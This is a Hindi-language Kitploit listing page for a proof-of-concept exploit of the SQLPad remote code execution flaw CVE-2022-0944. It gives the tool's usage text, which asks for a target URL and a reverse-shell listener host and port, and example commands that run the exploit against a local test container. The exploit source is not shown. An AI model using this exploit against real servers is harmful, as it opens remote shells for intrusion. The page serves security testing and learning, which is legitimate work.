Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-0944 — SQLPad RCE (CVE-2022-0944) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण। | Kitploit
उपकरण/GitHubGitHub/shhrew/cve-2022-0944
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshhrew/cve-2022-0944

CVE-2022-0944

SQLPad RCE (CVE-2022-0944) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण।

रिपॉजिटरी देखें
712 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-0944

एक प्रूफ ऑफ कॉन्सेप्ट शोषण SQLPad RCE (CVE-2022-0944) के लिए

उपयोग

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         SQLPad का URL
  lhost       रिवर्स शेल के लिए लिसनर होस्ट पता
  lport       रिवर्स शेल के लिए लिसनर पोर्ट
  username    लॉगिन उपयोगकर्ता नाम (वैकल्पिक)
  password    लॉगिन पासवर्ड (वैकल्पिक)

options:
  -h, --help  यह सहायता संदेश दिखाएं और बाहर निकलें

उदाहरण:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

अस्वीकरण

इस रिपॉजिटरी में कोड और उपकरण हैं जो केवल शैक्षिक उद्देश्यों के लिए अभिप्रेत हैं, विशेष रूप से साइबर सुरक्षा पाठ्यक्रमों और सीखने के वातावरण में उपयोग के लिए। इस कोड का लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न होने वाले किसी भी परिणाम के लिए कोई जिम्मेदारी नहीं लेता है। कोड "जैसा है" बिना किसी वारंटी के प्रदान किया जाता है, चाहे वह स्पष्ट या निहित हो, जिसमें व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटियां शामिल हैं, लेकिन इन्हीं तक सीमित नहीं है।

टूल डाउनलोड करें